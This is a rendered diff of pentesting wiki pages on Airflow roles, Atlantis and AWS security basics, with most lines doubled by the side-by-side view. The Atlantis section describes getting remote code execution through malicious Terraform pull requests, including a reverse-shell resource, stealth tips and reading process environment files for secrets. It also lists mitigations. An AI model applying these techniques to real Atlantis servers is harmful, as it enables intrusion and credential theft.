Airflow ships with a **set of roles by default**: **Admin**, **User**, **Op**, **Viewer**, and **Public**. **Only `Admin`** users could **configure/alter the permissions for other roles**. But it is not recommended that `Admin` users alter these default roles in any way by removing or adding permissions to these roles. Airflow ships with a **set of roles by default**: **Admin**, **User**, **Op**, **Viewer**, and **Public**. **Only `Admin`** users could **configure/alter the permissions for other roles**. But it is not recommended that `Admin` users alter these default roles in any way by removing or adding permissions to these roles.
@ -33,7 +31,7 @@ Note that **admin** users can **create more roles** with more **granular permiss
Also note that the only default role with **permission to list users and roles is Admin, not even Op** is going to be able to do that. Also note that the only default role with **permission to list users and roles is Admin, not even Op** is going to be able to do that.
### Default Permissions ## Default Permissions
These are the default permissions per default role: These are the default permissions per default role:

View file

@ -16,24 +16,23 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
## Atlantis
### Basic Information # Basic Information
Atlantis basically helps you to to run terraform from Pull Requests from your git server. Atlantis basically helps you to to run terraform from Pull Requests from your git server.
![](<../.gitbook/assets/image (307) (3).png>) ![](<../.gitbook/assets/image (307) (3).png>)
### Local Lab # Local Lab
1. Go to the **atlantis releases page** in [https://github.com/runatlantis/atlantis/releases](https://github.com/runatlantis/atlantis/releases) and **download** the one that suits you. 1. Go to the **atlantis releases page** in [https://github.com/runatlantis/atlantis/releases](https://github.com/runatlantis/atlantis/releases) and **download** the one that suits you.
2. Create a **personal token** (with repo access) of your **github** user 2. Create a **personal token** (with repo access) of your **github** user
3. Execute `./atlantis testdrive` and it will create a **demo repo** you can use to **talk to atlantis** 3. Execute `./atlantis testdrive` and it will create a **demo repo** you can use to **talk to atlantis**
1. You can access the web page in 127.0.0.1:4141 1. You can access the web page in 127.0.0.1:4141
### Atlantis Access # Atlantis Access
#### Git Server Credentials ## Git Server Credentials
**Atlantis** support several git hosts such as **Github**, **Gitlab**, **Bitbucket** and **Azure DevOps**.\ **Atlantis** support several git hosts such as **Github**, **Gitlab**, **Bitbucket** and **Azure DevOps**.\
However, in order to access the repos in those platforms and perform actions, it needs to have some **privileged access granted to them** (at least write permissions).\ However, in order to access the repos in those platforms and perform actions, it needs to have some **privileged access granted to them** (at least write permissions).\
@ -43,7 +42,7 @@ However, in order to access the repos in those platforms and perform actions, it
In any case, from an attackers perspective, the **Atlantis account** is going to be one very **interesting** **to compromise**. In any case, from an attackers perspective, the **Atlantis account** is going to be one very **interesting** **to compromise**.
{% endhint %} {% endhint %}
#### Webhooks ## Webhooks
Atlantis uses optionally [**Webhook secrets**](https://www.runatlantis.io/docs/webhook-secrets.html#generating-a-webhook-secret) to validate that the **webhooks** it receives from your Git host are **legitimate**. Atlantis uses optionally [**Webhook secrets**](https://www.runatlantis.io/docs/webhook-secrets.html#generating-a-webhook-secret) to validate that the **webhooks** it receives from your Git host are **legitimate**.
@ -55,7 +54,7 @@ Note that unless you use a private github or bitbucket server, you will need to
Atlantis is going to be **exposing webhooks** so the git server can send it information. From an attackers perspective it would be interesting to know **if you can send it messages**. Atlantis is going to be **exposing webhooks** so the git server can send it information. From an attackers perspective it would be interesting to know **if you can send it messages**.
{% endhint %} {% endhint %}
#### Provider Credentials <a href="#provider-credentials" id="provider-credentials"></a> ## Provider Credentials <a href="#provider-credentials" id="provider-credentials"></a>
Atlantis runs Terraform by simply **executing `terraform plan` and `apply`** commands on the server **Atlantis is hosted on**. Just like when you run Terraform locally, Atlantis needs credentials for your specific provider. Atlantis runs Terraform by simply **executing `terraform plan` and `apply`** commands on the server **Atlantis is hosted on**. Just like when you run Terraform locally, Atlantis needs credentials for your specific provider.
@ -73,13 +72,13 @@ It's up to you how you [provide credentials](https://www.runatlantis.io/docs/pro
The **container** where **Atlantis** is **running** will highly probably **contain privileged credentials** to the providers (AWS, GCP, Github...) that Atlantis is managing via Terraform. The **container** where **Atlantis** is **running** will highly probably **contain privileged credentials** to the providers (AWS, GCP, Github...) that Atlantis is managing via Terraform.
{% endhint %} {% endhint %}
#### Web Page ## Web Page
By default Atlantis will run a **web page in the port 4141 in localhost**. This page just allows you to enable/disable atlantis apply and check the plan status of the repos and unlock them (it doesn't allow to modify things, so it isn't that useful). By default Atlantis will run a **web page in the port 4141 in localhost**. This page just allows you to enable/disable atlantis apply and check the plan status of the repos and unlock them (it doesn't allow to modify things, so it isn't that useful).
You probably won't find it exposed to the internet, but it looks like by default **no credentials are needed** to access it (and if they are `atlantis`:`atlantis` are the **default** ones). You probably won't find it exposed to the internet, but it looks like by default **no credentials are needed** to access it (and if they are `atlantis`:`atlantis` are the **default** ones).
### Server Configuration # Server Configuration
Configuration to `atlantis server` can be specified via command line flags, environment variables, a config file or a mix of the three. Configuration to `atlantis server` can be specified via command line flags, environment variables, a config file or a mix of the three.
@ -96,7 +95,7 @@ Values are **chosen in this order**:
Note that in the configuration you might find interesting values such as **tokens and passwords**. Note that in the configuration you might find interesting values such as **tokens and passwords**.
{% endhint %} {% endhint %}
#### Repos Configuration ## Repos Configuration
Some configurations affects **how the repos are managed**. However, it's possible that **each repo require different settings**, so there are ways to specify each repo. This is the priority order: Some configurations affects **how the repos are managed**. However, it's possible that **each repo require different settings**, so there are ways to specify each repo. This is the priority order:
@ -155,7 +154,7 @@ Atlantis supports running **server-side** [**conftest**](https://www.conftest.de
You can check how to configure it in [**the docs**](https://www.runatlantis.io/docs/policy-checking.html#how-it-works). You can check how to configure it in [**the docs**](https://www.runatlantis.io/docs/policy-checking.html#how-it-works).
### Atlantis Commands # Atlantis Commands
\*\*\*\*[**In the docs**](https://www.runatlantis.io/docs/using-atlantis.html#using-atlantis) you can find the options you can use to run Atlantis: \*\*\*\*[**In the docs**](https://www.runatlantis.io/docs/using-atlantis.html#using-atlantis) you can find the options you can use to run Atlantis:
@ -165,24 +164,24 @@ atlantis help
# Run terraform plan # Run terraform plan
atlantis plan [options] -- [terraform plan flags] atlantis plan [options] -- [terraform plan flags]
##Options: #Options:
## -d directory # -d directory
## -p project # -p project
## --verbose # --verbose
## You can also add extra terraform options # You can also add extra terraform options
# Run terraform apply # Run terraform apply
atlantis apply [options] -- [terraform apply flags] atlantis apply [options] -- [terraform apply flags]
##Options: #Options:
## -d directory # -d directory
## -p project # -p project
## -w workspace # -w workspace
## --auto-merge-disabled # --auto-merge-disabled
## --verbose # --verbose
## You can also add extra terraform options # You can also add extra terraform options
``` ```
### Attacks # Attacks
{% hint style="warning" %} {% hint style="warning" %}
If during the exploitation you find this **error**: `Error: Error acquiring the state lock` If during the exploitation you find this **error**: `Error: Error acquiring the state lock`
@ -195,7 +194,7 @@ atlantis plan -- -lock=false
``` ```
{% endhint %} {% endhint %}
#### Atlantis plan RCE - Config modification in new PR ## Atlantis plan RCE - Config modification in new PR
If you have write access over a repository you will be able to create a new branch on it and generate a PR. If you can \*\*execute `atlantis plan` \*\* (or maybe it's automatically executed) **you will be able to RCE inside the Atlantis server**. If you have write access over a repository you will be able to create a new branch on it and generate a PR. If you can \*\*execute `atlantis plan` \*\* (or maybe it's automatically executed) **you will be able to RCE inside the Atlantis server**.
@ -224,7 +223,7 @@ You can find the rev shell code in [https://github.com/carlospolop/terraform\_ex
* In the external resource, use the **ref** feature to hide the **terraform rev shell code in a branch** inside of the repo, something like: `git@github.com:carlospolop/terraform_external_module_rev_shell//modules?ref=b401d2b` * In the external resource, use the **ref** feature to hide the **terraform rev shell code in a branch** inside of the repo, something like: `git@github.com:carlospolop/terraform_external_module_rev_shell//modules?ref=b401d2b`
* **Instead** of creating a **PR to master** to trigger Atlantis, **create 2 branches** (test1 and test2) and create a **PR from one to the other**. When you have completed the attack, just **remove the PR and the branches**. * **Instead** of creating a **PR to master** to trigger Atlantis, **create 2 branches** (test1 and test2) and create a **PR from one to the other**. When you have completed the attack, just **remove the PR and the branches**.
#### Atlantis apply RCE - Config modification in new PR ## Atlantis apply RCE - Config modification in new PR
If you have write access over a repository you will be able to create a new branch on it and generate a PR. If you can **execute `atlantis apply` you will be able to RCE inside the Atlantis server**. If you have write access over a repository you will be able to create a new branch on it and generate a PR. If you can **execute `atlantis apply` you will be able to RCE inside the Atlantis server**.
@ -256,7 +255,7 @@ resource "null_resource" "rev_shell" {
Follow the **suggestions from the previous technique** the perform this attack in a **stealthier way**. Follow the **suggestions from the previous technique** the perform this attack in a **stealthier way**.
#### Terraform Param Injection ## Terraform Param Injection
When running `atlantis plan` or `atlantis apply` terraform is being run under-needs, you can pass commands to terraform from atlantis commenting something like: When running `atlantis plan` or `atlantis apply` terraform is being run under-needs, you can pass commands to terraform from atlantis commenting something like:
@ -270,7 +269,7 @@ atlantis apply -- -h #Get terraform apply help
Something you can pass are env variables which might be helpful to bypass some protections. Check terraform env vars in [https://www.terraform.io/cli/config/environment-variables](https://www.terraform.io/cli/config/environment-variables) Something you can pass are env variables which might be helpful to bypass some protections. Check terraform env vars in [https://www.terraform.io/cli/config/environment-variables](https://www.terraform.io/cli/config/environment-variables)
#### Custom Workflow ## Custom Workflow
Running **malicious custom build commands** specified in an `atlantis.yaml` file. Atlantis uses the `atlantis.yaml` file from the pull request branch, **not** of `master`.\ Running **malicious custom build commands** specified in an `atlantis.yaml` file. Atlantis uses the `atlantis.yaml` file from the pull request branch, **not** of `master`.\
This possibility was mentioned in a previous section: This possibility was mentioned in a previous section:
@ -297,7 +296,7 @@ workflows:
``` ```
{% endhint %} {% endhint %}
#### PR Hijacking ## PR Hijacking
If someone sends **`atlantis plan/apply` comments on your valid pull requests,** it will cause terraform to run when you don't want it to. If someone sends **`atlantis plan/apply` comments on your valid pull requests,** it will cause terraform to run when you don't want it to.
@ -307,11 +306,11 @@ This is the **setting** in Github branch protections:
![](<../.gitbook/assets/image (375) (1).png>) ![](<../.gitbook/assets/image (375) (1).png>)
#### Webhook Secret ## Webhook Secret
If you manage to **steal the webhook secret** used or if there **isn't any webhook secret** being used, you could **call the Atlantis webhook** and **invoke atlatis commands** directly. If you manage to **steal the webhook secret** used or if there **isn't any webhook secret** being used, you could **call the Atlantis webhook** and **invoke atlatis commands** directly.
#### Bitbucket ## Bitbucket
Bitbucket Cloud does **not support webhook secrets**. This could allow attackers to **spoof requests from Bitbucket**. Ensure you are allowing only Bitbucket IPs. Bitbucket Cloud does **not support webhook secrets**. This could allow attackers to **spoof requests from Bitbucket**. Ensure you are allowing only Bitbucket IPs.
@ -319,7 +318,7 @@ Bitbucket Cloud does **not support webhook secrets**. This could allow attackers
* If you are specifying `--repo-allowlist` then they could only fake requests pertaining to those repos so the most damage they could do would be to plan/apply on your own repos. * If you are specifying `--repo-allowlist` then they could only fake requests pertaining to those repos so the most damage they could do would be to plan/apply on your own repos.
* To prevent this, allowlist [Bitbucket's IP addresses](https://confluence.atlassian.com/bitbucket/what-are-the-bitbucket-cloud-ip-addresses-i-should-use-to-configure-my-corporate-firewall-343343385.html) (see Outbound IPv4 addresses). * To prevent this, allowlist [Bitbucket's IP addresses](https://confluence.atlassian.com/bitbucket/what-are-the-bitbucket-cloud-ip-addresses-i-should-use-to-configure-my-corporate-firewall-343343385.html) (see Outbound IPv4 addresses).
### Post-Exploitation # Post-Exploitation
If you managed to get access to the server or at least you got a LFI there are some interesting things you should try to read: If you managed to get access to the server or at least you got a LFI there are some interesting things you should try to read:
@ -330,17 +329,17 @@ If you managed to get access to the server or at least you got a LFI there are s
* `/proc/1/environ` Env variables * `/proc/1/environ` Env variables
* `/proc/[2-20]/cmdline` Cmd line of `atlantis server` (may contain sensitive data) * `/proc/[2-20]/cmdline` Cmd line of `atlantis server` (may contain sensitive data)
### Mitigations # Mitigations
#### Don't Use On Public Repos <a href="#don-t-use-on-public-repos" id="don-t-use-on-public-repos"></a> ## Don't Use On Public Repos <a href="#don-t-use-on-public-repos" id="don-t-use-on-public-repos"></a>
Because anyone can comment on public pull requests, even with all the security mitigations available, it's still dangerous to run Atlantis on public repos without proper configuration of the security settings. Because anyone can comment on public pull requests, even with all the security mitigations available, it's still dangerous to run Atlantis on public repos without proper configuration of the security settings.
#### Don't Use `--allow-fork-prs` <a href="#don-t-use-allow-fork-prs" id="don-t-use-allow-fork-prs"></a> ## Don't Use `--allow-fork-prs` <a href="#don-t-use-allow-fork-prs" id="don-t-use-allow-fork-prs"></a>
If you're running on a public repo (which isn't recommended, see above) you shouldn't set `--allow-fork-prs` (defaults to false) because anyone can open up a pull request from their fork to your repo. If you're running on a public repo (which isn't recommended, see above) you shouldn't set `--allow-fork-prs` (defaults to false) because anyone can open up a pull request from their fork to your repo.
#### `--repo-allowlist` <a href="#repo-allowlist" id="repo-allowlist"></a> ## `--repo-allowlist` <a href="#repo-allowlist" id="repo-allowlist"></a>
Atlantis requires you to specify a allowlist of repositories it will accept webhooks from via the `--repo-allowlist` flag. For example: Atlantis requires you to specify a allowlist of repositories it will accept webhooks from via the `--repo-allowlist` flag. For example:
@ -351,7 +350,7 @@ Atlantis requires you to specify a allowlist of repositories it will accept webh
This flag ensures your Atlantis install isn't being used with repositories you don't control. See `atlantis server --help` for more details. This flag ensures your Atlantis install isn't being used with repositories you don't control. See `atlantis server --help` for more details.
#### Protect Terraform Planning <a href="#protect-terraform-planning" id="protect-terraform-planning"></a> ## Protect Terraform Planning <a href="#protect-terraform-planning" id="protect-terraform-planning"></a>
If attackers submitting pull requests with malicious Terraform code is in your threat model then you must be aware that `terraform apply` approvals are not enough. It is possible to run malicious code in a `terraform plan` using the [`external` data source](https://registry.terraform.io/providers/hashicorp/external/latest/docs/data-sources/data\_source) or by specifying a malicious provider. This code could then exfiltrate your credentials. If attackers submitting pull requests with malicious Terraform code is in your threat model then you must be aware that `terraform apply` approvals are not enough. It is possible to run malicious code in a `terraform plan` using the [`external` data source](https://registry.terraform.io/providers/hashicorp/external/latest/docs/data-sources/data\_source) or by specifying a malicious provider. This code could then exfiltrate your credentials.
@ -361,7 +360,7 @@ To prevent this, you could:
2. Implement the provider registry protocol internally and deny public egress, that way you control who has write access to the registry. 2. Implement the provider registry protocol internally and deny public egress, that way you control who has write access to the registry.
3. Modify your [server-side repo configuration](https://www.runatlantis.io/docs/server-side-repo-config.html)'s `plan` step to validate against the use of disallowed providers or data sources or PRs from not allowed users. You could also add in extra validation at this point, e.g. requiring a "thumbs-up" on the PR before allowing the `plan` to continue. Conftest could be of use here. 3. Modify your [server-side repo configuration](https://www.runatlantis.io/docs/server-side-repo-config.html)'s `plan` step to validate against the use of disallowed providers or data sources or PRs from not allowed users. You could also add in extra validation at this point, e.g. requiring a "thumbs-up" on the PR before allowing the `plan` to continue. Conftest could be of use here.
#### Webhook Secrets <a href="#webhook-secrets" id="webhook-secrets"></a> ## Webhook Secrets <a href="#webhook-secrets" id="webhook-secrets"></a>
Atlantis should be run with Webhook secrets set via the `$ATLANTIS_GH_WEBHOOK_SECRET`/`$ATLANTIS_GITLAB_WEBHOOK_SECRET` environment variables. Even with the `--repo-allowlist` flag set, without a webhook secret, attackers could make requests to Atlantis posing as a repository that is allowlisted. Webhook secrets ensure that the webhook requests are actually coming from your VCS provider (GitHub or GitLab). Atlantis should be run with Webhook secrets set via the `$ATLANTIS_GH_WEBHOOK_SECRET`/`$ATLANTIS_GITLAB_WEBHOOK_SECRET` environment variables. Even with the `--repo-allowlist` flag set, without a webhook secret, attackers could make requests to Atlantis posing as a repository that is allowlisted. Webhook secrets ensure that the webhook requests are actually coming from your VCS provider (GitHub or GitLab).
@ -371,17 +370,17 @@ If you are using Azure DevOps, instead of webhook secrets add a basic username a
Azure DevOps supports sending a basic authentication header in all webhook events. This requires using an HTTPS URL for your webhook location. Azure DevOps supports sending a basic authentication header in all webhook events. This requires using an HTTPS URL for your webhook location.
#### SSL/HTTPS <a href="#ssl-https" id="ssl-https"></a> ## SSL/HTTPS <a href="#ssl-https" id="ssl-https"></a>
If you're using webhook secrets but your traffic is over HTTP then the webhook secrets could be stolen. Enable SSL/HTTPS using the `--ssl-cert-file` and `--ssl-key-file` flags. If you're using webhook secrets but your traffic is over HTTP then the webhook secrets could be stolen. Enable SSL/HTTPS using the `--ssl-cert-file` and `--ssl-key-file` flags.
#### Enable Authentication on Atlantis Web Server <a href="#enable-authentication-on-atlantis-web-server" id="enable-authentication-on-atlantis-web-server"></a> ## Enable Authentication on Atlantis Web Server <a href="#enable-authentication-on-atlantis-web-server" id="enable-authentication-on-atlantis-web-server"></a>
It is very recommended to enable authentication in the web service. Enable BasicAuth using the `--web-basic-auth=true` and setup a username and a password using `--web-username=yourUsername` and `--web-password=yourPassword` flags. It is very recommended to enable authentication in the web service. Enable BasicAuth using the `--web-basic-auth=true` and setup a username and a password using `--web-username=yourUsername` and `--web-password=yourPassword` flags.
You can also pass these as environment variables `ATLANTIS_WEB_BASIC_AUTH=true` `ATLANTIS_WEB_USERNAME=yourUsername` and `ATLANTIS_WEB_PASSWORD=yourPassword`. You can also pass these as environment variables `ATLANTIS_WEB_BASIC_AUTH=true` `ATLANTIS_WEB_USERNAME=yourUsername` and `ATLANTIS_WEB_PASSWORD=yourPassword`.
### References # References
* [**https://www.runatlantis.io/docs**](https://www.runatlantis.io/docs)\*\*\*\* * [**https://www.runatlantis.io/docs**](https://www.runatlantis.io/docs)\*\*\*\*

View file

@ -17,11 +17,9 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
# AWS Security # Types of services
## Types of services ## Container services
### Container services
Services that fall under container services have the following characteristics: Services that fall under container services have the following characteristics:
@ -32,7 +30,7 @@ Services that fall under container services have the following characteristics:
* Also, platform-level identity and access management where it exists. * Also, platform-level identity and access management where it exists.
* **Examples** of AWS container services include Relational Database Service, Elastic Mapreduce, and Elastic Beanstalk. * **Examples** of AWS container services include Relational Database Service, Elastic Mapreduce, and Elastic Beanstalk.
### Abstract Services ## Abstract Services
* These services are **removed, abstracted, from the platform or management layer which cloud applications are built on**. * These services are **removed, abstracted, from the platform or management layer which cloud applications are built on**.
* The services are accessed via endpoints using AWS application programming interfaces, APIs. * The services are accessed via endpoints using AWS application programming interfaces, APIs.
@ -41,7 +39,7 @@ Services that fall under container services have the following characteristics:
* **Data is isolated via security mechanisms**. * **Data is isolated via security mechanisms**.
* Abstract services have a strong integration with IAM, and **examples** of abstract services include S3, DynamoDB, Amazon Glacier, and SQS. * Abstract services have a strong integration with IAM, and **examples** of abstract services include S3, DynamoDB, Amazon Glacier, and SQS.
## IAM - Identity and Access Management # IAM - Identity and Access Management
IAM is the service that will allow you to manage **Authentication**, **Authorization** and **Access Control** inside your AWS account. IAM is the service that will allow you to manage **Authentication**, **Authorization** and **Access Control** inside your AWS account.
@ -51,11 +49,11 @@ IAM is the service that will allow you to manage **Authentication**, **Authoriza
IAM can be defined by its ability to manage, control and govern authentication, authorization and access control mechanisms of identities to your resources within your AWS account. IAM can be defined by its ability to manage, control and govern authentication, authorization and access control mechanisms of identities to your resources within your AWS account.
### Users ## Users
This could be a **real person** within your organization who requires access to operate and maintain your AWS environment. Or it could be an account to be used by an **application** that may require permissions to **access** your **AWS** resources **programmatically**. Note that **usernames must be unique**. This could be a **real person** within your organization who requires access to operate and maintain your AWS environment. Or it could be an account to be used by an **application** that may require permissions to **access** your **AWS** resources **programmatically**. Note that **usernames must be unique**.
#### CLI ### CLI
* **Access Key ID**: 20 random uppercase alphanumeric characters like AKHDNAPO86BSHKDIRYT * **Access Key ID**: 20 random uppercase alphanumeric characters like AKHDNAPO86BSHKDIRYT
* **Secret access key ID**: 40 random upper and lowercase characters: S836fh/J73yHSb64Ag3Rkdi/jaD6sPl6/antFtU (It's not possible to retrieve lost secret access key IDs). * **Secret access key ID**: 40 random upper and lowercase characters: S836fh/J73yHSb64Ag3Rkdi/jaD6sPl6/antFtU (It's not possible to retrieve lost secret access key IDs).
@ -65,23 +63,23 @@ _Create a new access key -> Apply the new key to system/application -> mark orig
**MFA** is **supported** when using the AWS **CLI**. **MFA** is **supported** when using the AWS **CLI**.
### Groups ## Groups
These are objects that **contain multiple users**. Permissions can be assigned to a user or inherit form a group. **Giving permission to groups and not to users the secure way to grant permissions**. These are objects that **contain multiple users**. Permissions can be assigned to a user or inherit form a group. **Giving permission to groups and not to users the secure way to grant permissions**.
### Roles ## Roles
Roles are used to grant identities a set of permissions. **Roles don't have any access keys or credentials associated with them**. Roles are usually used with resources (like EC2 machines) but they can also be useful to grant **temporary privileges to a user**. Note that when for example an EC2 has an IAM role assigned, instead of saving some keys inside the machine, dynamic temporary access keys will be supplied by the IAM role to handle authentication and determine if access is authorized. Roles are used to grant identities a set of permissions. **Roles don't have any access keys or credentials associated with them**. Roles are usually used with resources (like EC2 machines) but they can also be useful to grant **temporary privileges to a user**. Note that when for example an EC2 has an IAM role assigned, instead of saving some keys inside the machine, dynamic temporary access keys will be supplied by the IAM role to handle authentication and determine if access is authorized.
An IAM role consists of **two types of policies**: A **trust policy**, which cannot be empty, defining who can assume the role, and a **permissions policy**, which cannot be empty, defining what they can access. An IAM role consists of **two types of policies**: A **trust policy**, which cannot be empty, defining who can assume the role, and a **permissions policy**, which cannot be empty, defining what they can access.
#### AWS Security Token Service (STS) ### AWS Security Token Service (STS)
This is a web service that enables you to **request temporary, limited-privilege credentials** for AWS Identity and Access Management (IAM) users or for users that you authenticate (federated users). This is a web service that enables you to **request temporary, limited-privilege credentials** for AWS Identity and Access Management (IAM) users or for users that you authenticate (federated users).
### Policies ## Policies
#### Policy Permissions ### Policy Permissions
Are used to assign permissions. There are 2 types: Are used to assign permissions. There are 2 types:
@ -114,32 +112,32 @@ If **single "Deny" exist, it will override the "Allow"**, except for requests th
} }
``` ```
#### Inline Policies ### Inline Policies
This kind of policies are **directly assigned** to a user, group or role. Then, they not appear in the Policies list as any other one can use them.\ This kind of policies are **directly assigned** to a user, group or role. Then, they not appear in the Policies list as any other one can use them.\
Inline policies are useful if you want to **maintain a strict one-to-one relationship between a policy and the identity** that it's applied to. For example, you want to be sure that the permissions in a policy are not inadvertently assigned to an identity other than the one they're intended for. When you use an inline policy, the permissions in the policy cannot be inadvertently attached to the wrong identity. In addition, when you use the AWS Management Console to delete that identity, the policies embedded in the identity are deleted as well. That's because they are part of the principal entity. Inline policies are useful if you want to **maintain a strict one-to-one relationship between a policy and the identity** that it's applied to. For example, you want to be sure that the permissions in a policy are not inadvertently assigned to an identity other than the one they're intended for. When you use an inline policy, the permissions in the policy cannot be inadvertently attached to the wrong identity. In addition, when you use the AWS Management Console to delete that identity, the policies embedded in the identity are deleted as well. That's because they are part of the principal entity.
#### S3 Bucket Policies ### S3 Bucket Policies
Can only be applied to S3 Buckets. They contains an attribute called 'principal' that can be: IAM users, Federated users, another AWS account, an AWS service. P**rincipals define who/what should be allowed or denied access to various S3 resources.** Can only be applied to S3 Buckets. They contains an attribute called 'principal' that can be: IAM users, Federated users, another AWS account, an AWS service. P**rincipals define who/what should be allowed or denied access to various S3 resources.**
### Multi-Factor Authentication ## Multi-Factor Authentication
It's used to **create an additional factor for authentication** in addition to your existing methods, such as password, therefore, creating a multi-factor level of authentication.\ It's used to **create an additional factor for authentication** in addition to your existing methods, such as password, therefore, creating a multi-factor level of authentication.\
You can use a **free virtual application or a physical device**. You can use apps like google authentication for free to activate a MFA in AWS. You can use a **free virtual application or a physical device**. You can use apps like google authentication for free to activate a MFA in AWS.
### Identity Federation ## Identity Federation
Identity federation **allows users from identity providers which are external** to AWS to access AWS resources securely without having to supply AWS user credentials from a valid IAM user account. \ Identity federation **allows users from identity providers which are external** to AWS to access AWS resources securely without having to supply AWS user credentials from a valid IAM user account. \
An example of an identity provider can be your own corporate Microsoft Active Directory(via SAML) or OpenID services (like Google). Federated access will then allow the users within it to access AWS.\ An example of an identity provider can be your own corporate Microsoft Active Directory(via SAML) or OpenID services (like Google). Federated access will then allow the users within it to access AWS.\
AWS Identity Federation connects via IAM roles. AWS Identity Federation connects via IAM roles.
#### Cross Account Trusts and Roles ### Cross Account Trusts and Roles
**A user** (trusting) can create a Cross Account Role with some policies and then, **allow another user** (trusted) to **access his account** but only h**aving the access indicated in the new role policies**. To create this, just create a new Role and select Cross Account Role. Roles for Cross-Account Access offers two options. Providing access between AWS accounts that you own, and providing access between an account that you own and a third party AWS account.\ **A user** (trusting) can create a Cross Account Role with some policies and then, **allow another user** (trusted) to **access his account** but only h**aving the access indicated in the new role policies**. To create this, just create a new Role and select Cross Account Role. Roles for Cross-Account Access offers two options. Providing access between AWS accounts that you own, and providing access between an account that you own and a third party AWS account.\
It's recommended to **specify the user who is trusted and not put some generic thing** because if not, other authenticated users like federated users will be able to also abuse this trust. It's recommended to **specify the user who is trusted and not put some generic thing** because if not, other authenticated users like federated users will be able to also abuse this trust.
#### AWS Simple AD ### AWS Simple AD
Not supported: Not supported:
@ -151,16 +149,16 @@ Not supported:
* Schema Extensions * Schema Extensions
* No Direct access to OS or Instances * No Direct access to OS or Instances
#### Web Federation or OpenID Authentication ### Web Federation or OpenID Authentication
The app uses the AssumeRoleWithWebIdentity to create temporary credentials. However this doesn't grant access to the AWS console, just access to resources within AWS. The app uses the AssumeRoleWithWebIdentity to create temporary credentials. However this doesn't grant access to the AWS console, just access to resources within AWS.
### Other IAM options ## Other IAM options
* You can **set a password policy setting** options like minimum length and password requirements. * You can **set a password policy setting** options like minimum length and password requirements.
* You can **download "Credential Report"** with information about current credentials (like user creation time, is password enabled...). You can generate a credential report as often as once every **four hours**. * You can **download "Credential Report"** with information about current credentials (like user creation time, is password enabled...). You can generate a credential report as often as once every **four hours**.
## KMS - Key Management Service # KMS - Key Management Service
AWS Key Management Service (AWS KMS) is a managed service that makes it easy for you to **create and control **_**customer master keys**_** (CMKs)**, the encryption keys used to encrypt your data. AWS KMS CMKs are **protected by hardware security modules** (HSMs) AWS Key Management Service (AWS KMS) is a managed service that makes it easy for you to **create and control **_**customer master keys**_** (CMKs)**, the encryption keys used to encrypt your data. AWS KMS CMKs are **protected by hardware security modules** (HSMs)
@ -180,7 +178,7 @@ There are 2 types of master keys:
**Envelope Encryption** in the context of Key Management Service (KMS): Two-tier hierarchy system to **encrypt data with data key and then encrypt data key with master key**. **Envelope Encryption** in the context of Key Management Service (KMS): Two-tier hierarchy system to **encrypt data with data key and then encrypt data key with master key**.
### Key Policies ## Key Policies
These defines **who can use and access a key in KMS**. By default root user has full access over KMS, if you delete this one, you need to contact AWS for support. These defines **who can use and access a key in KMS**. By default root user has full access over KMS, if you delete this one, you need to contact AWS for support.
@ -204,7 +202,7 @@ Access:
* Via IAM policy * Via IAM policy
* Via grants * Via grants
### Key Administrators ## Key Administrators
Key administrator by default: Key administrator by default:
@ -212,7 +210,7 @@ Key administrator by default:
* Only IAM users and roles can be added to Key Administrators list (not groups) * Only IAM users and roles can be added to Key Administrators list (not groups)
* If external CMK is used, Key Administrators have the permission to import key material * If external CMK is used, Key Administrators have the permission to import key material
### Rotation of CMKs ## Rotation of CMKs
* The longer the same key is left in place, the more data is encrypted with that key, and if that key is breached, then the wider the blast area of data is at risk. In addition to this, the longer the key is active, the probability of it being breached increases. * The longer the same key is left in place, the more data is encrypted with that key, and if that key is breached, then the wider the blast area of data is at risk. In addition to this, the longer the key is active, the probability of it being breached increases.
* **KMS rotate customer keys every 365 days** (or you can perform the process manually whenever you want) and **keys managed by AWS every 3 years** and this time it cannot be changed. * **KMS rotate customer keys every 365 days** (or you can perform the process manually whenever you want) and **keys managed by AWS every 3 years** and this time it cannot be changed.
@ -220,7 +218,7 @@ Key administrator by default:
* In a break, rotating the key won't remove the threat as it will be possible to decrypt all the data encrypted with the compromised key. However, the **new data will be encrypted with the new key**. * In a break, rotating the key won't remove the threat as it will be possible to decrypt all the data encrypted with the compromised key. However, the **new data will be encrypted with the new key**.
* If **CMK** is in state of **disabled** or **pending** **deletion**, KMS will **not perform a key rotation** until the CMK is re-enabled or deletion is cancelled. * If **CMK** is in state of **disabled** or **pending** **deletion**, KMS will **not perform a key rotation** until the CMK is re-enabled or deletion is cancelled.
#### Manual rotation ### Manual rotation
* A **new CMK needs to be created**, then, a new CMK-ID is created, so you will need to **update** any **application** to **reference** the new CMK-ID. * A **new CMK needs to be created**, then, a new CMK-ID is created, so you will need to **update** any **application** to **reference** the new CMK-ID.
* To do this process easier you can **use aliases to refer to a key-id** and then just update the key the alias is referring to. * To do this process easier you can **use aliases to refer to a key-id** and then just update the key the alias is referring to.
@ -228,7 +226,7 @@ Key administrator by default:
You can import keys from your on-premises key infrastructure . You can import keys from your on-premises key infrastructure .
### Other information ## Other information
KMS is priced per number of encryption/decryption requests received from all services per month. KMS is priced per number of encryption/decryption requests received from all services per month.
@ -242,7 +240,7 @@ With KMS policy you can do the following:
You cannot synchronize or move/copy keys across regions; you can only define rules to allow access across region. You cannot synchronize or move/copy keys across regions; you can only define rules to allow access across region.
## S3 # S3
Amazon S3 is a service that allows you **store important amounts of data**. Amazon S3 is a service that allows you **store important amounts of data**.
@ -250,11 +248,11 @@ Amazon S3 provides multiple options to achieve the **protection** of data at RES
With resource-based permissions, you can define permissions for sub-directories of your bucket separately. With resource-based permissions, you can define permissions for sub-directories of your bucket separately.
### S3 Access logs ## S3 Access logs
It's possible to **enable S3 access login** (which by default is disabled) to some bucket and save the logs in a different bucket to know who is accessing the bucket. The source bucket and the target bucket (the one is saving the logs needs to be in the same region. It's possible to **enable S3 access login** (which by default is disabled) to some bucket and save the logs in a different bucket to know who is accessing the bucket. The source bucket and the target bucket (the one is saving the logs needs to be in the same region.
### S3 Encryption Mechanisms ## S3 Encryption Mechanisms
**DEK means Data Encryption Key** and is the key that is always generated and used to encrypt data. **DEK means Data Encryption Key** and is the key that is always generated and used to encrypt data.
@ -314,7 +312,7 @@ Please, note that in this case **the key is managed by AWS** (rotation only ever
* S3 sends the encrypted data and DEK * S3 sends the encrypted data and DEK
